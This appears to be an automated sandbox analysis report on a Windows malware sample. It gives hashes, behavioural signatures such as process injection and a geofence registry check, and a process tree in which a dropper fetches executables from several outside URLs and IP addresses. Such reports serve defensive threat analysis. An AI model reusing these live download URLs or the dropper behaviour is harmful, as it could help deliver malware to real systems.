Analysis
Max time kernel: 165s
Max time network: 176s
Platform: windows10-2004_x64
Resource: win10v2004-20221111-en
Resource tags: arch:x64, arch:x86, image:win10v2004-20221111-en, locale:en-us, os:windows10-2004-x64, system
Submitted: 03-12-2022 15:31

Static task: static1

Behavioral task: behavioral1
Sample: acafbb6610893f5da600a27947f3b5e8ecb98f47090945e90c4aa52bfb658ce0.exe
Resource: win7-20220901-en

Behavioral task: behavioral2
Sample: acafbb6610893f5da600a27947f3b5e8ecb98f47090945e90c4aa52bfb658ce0.exe
Resource: win10v2004-20221111-en
General
Target: acafbb6610893f5da600a27947f3b5e8ecb98f47090945e90c4aa52bfb658ce0.exe
Size: 347KB
MD5: a7967e1aa22420c7f9d2aa74f14e2806
SHA1: e2326fe3a4542e1fe8652875092f45042e6a905c
SHA256: acafbb6610893f5da600a27947f3b5e8ecb98f47090945e90c4aa52bfb658ce0
SHA512: 8615d0cfadb558fe01c36b4516424bb30de90d92c5dae49a5917411277ce0e07e23712fe328be12df10ed30002488f56bf94ef0e74e08f938b6836dcdbf1de0b
SSDEEP: 6144:BME1nmg1tDbJ5621YNzigKurmXGf09javBGL8ap7mdALnXOGkUTYAm802G1wZ743:ugnJziA/8vBva7m+Ln5kcjhHG1+UWw
Malware Config
Signatures

Executes dropped EXE (4 IoCs)
pid | Process
2468 | Urseiklmn.exe
2224 | Urseiklmn.exe
3424 | Urseiklmn.exe
3000 | Urseiklmn.exe

Checks computer location settings (2 TTPs, 1 IoC)
Looks up country code configured in the registry, likely geofence.
description | ioc | Process
Key value queried | \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Control Panel\International\Geo\Nation | acafbb6610893f5da600a27947f3b5e8ecb98f47090945e90c4aa52bfb658ce0.exe

Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

Suspicious use of WriteProcessMemory (12 IoCs)
description | pid | Process | procid_target
PID 1336 wrote to memory of 2468 | 1336 | acafbb6610893f5da600a27947f3b5e8ecb98f47090945e90c4aa52bfb658ce0.exe | 83
PID 1336 wrote to memory of 2468 | 1336 | acafbb6610893f5da600a27947f3b5e8ecb98f47090945e90c4aa52bfb658ce0.exe | 83
PID 1336 wrote to memory of 2468 | 1336 | acafbb6610893f5da600a27947f3b5e8ecb98f47090945e90c4aa52bfb658ce0.exe | 83
PID 1336 wrote to memory of 2224 | 1336 | acafbb6610893f5da600a27947f3b5e8ecb98f47090945e90c4aa52bfb658ce0.exe | 86
PID 1336 wrote to memory of 2224 | 1336 | acafbb6610893f5da600a27947f3b5e8ecb98f47090945e90c4aa52bfb658ce0.exe | 86
PID 1336 wrote to memory of 2224 | 1336 | acafbb6610893f5da600a27947f3b5e8ecb98f47090945e90c4aa52bfb658ce0.exe | 86
PID 1336 wrote to memory of 3424 | 1336 | acafbb6610893f5da600a27947f3b5e8ecb98f47090945e90c4aa52bfb658ce0.exe | 88
PID 1336 wrote to memory of 3424 | 1336 | acafbb6610893f5da600a27947f3b5e8ecb98f47090945e90c4aa52bfb658ce0.exe | 88
PID 1336 wrote to memory of 3424 | 1336 | acafbb6610893f5da600a27947f3b5e8ecb98f47090945e90c4aa52bfb658ce0.exe | 88
PID 1336 wrote to memory of 3000 | 1336 | acafbb6610893f5da600a27947f3b5e8ecb98f47090945e90c4aa52bfb658ce0.exe | 92
PID 1336 wrote to memory of 3000 | 1336 | acafbb6610893f5da600a27947f3b5e8ecb98f47090945e90c4aa52bfb658ce0.exe | 92
PID 1336 wrote to memory of 3000 | 1336 | acafbb6610893f5da600a27947f3b5e8ecb98f47090945e90c4aa52bfb658ce0.exe | 92
Processes

C:\Users\Admin\AppData\Local\Temp\acafbb6610893f5da600a27947f3b5e8ecb98f47090945e90c4aa52bfb658ce0.exe (PID: 1336)
Command line: "C:\Users\Admin\AppData\Local\Temp\acafbb6610893f5da600a27947f3b5e8ecb98f47090945e90c4aa52bfb658ce0.exe"
- Checks computer location settings
- Suspicious use of WriteProcessMemory

  Child: C:\Users\Admin\AppData\Local\Temp\RarSFX0\Urseiklmn.exe (PID: 2468)
  Command line: "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Urseiklmn.exe" "http://gtszylcd.3322.org:8181/shenge.exe"
  - Executes dropped EXE

  Child: C:\Users\Admin\AppData\Local\Temp\RarSFX0\Urseiklmn.exe (PID: 2224)
  Command line: "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Urseiklmn.exe" "http://d1.downxia.net/downloader/setup3002.exe"
  - Executes dropped EXE

  Child: C:\Users\Admin\AppData\Local\Temp\RarSFX0\Urseiklmn.exe (PID: 3424)
  Command line: "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Urseiklmn.exe" "http://dl.youbak.com/msn/software/partner/mfq/haoya.exe"
  - Executes dropped EXE

  Child: C:\Users\Admin\AppData\Local\Temp\RarSFX0\Urseiklmn.exe (PID: 3000)
  Command line: "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Urseiklmn.exe" "http://61.156.40.231:81/soft/OemWpsSetup40.6.exe"
  - Executes dropped EXE
Network
MITRE ATT&CK Enterprise v6
Downloads
Filesize: 499KB
MD5: 783291f2ef79f9537cc509c53076c3b3
SHA1: 855265fd62d97bf04cda9a8d1cf0f3f6ede9300f
SHA256: 5bf59159c93899076a347ff40ebcbbea9dae7c8c16090e573171de248712c5d4
SHA512: 2d251b804cb40eed40bf3d714413471c2bd3397008fedb54fa6b279ced88feee8b4d07ac94993b89eeb329865a0e9dae5412ffd957f6e52bdf208d0f366dccdf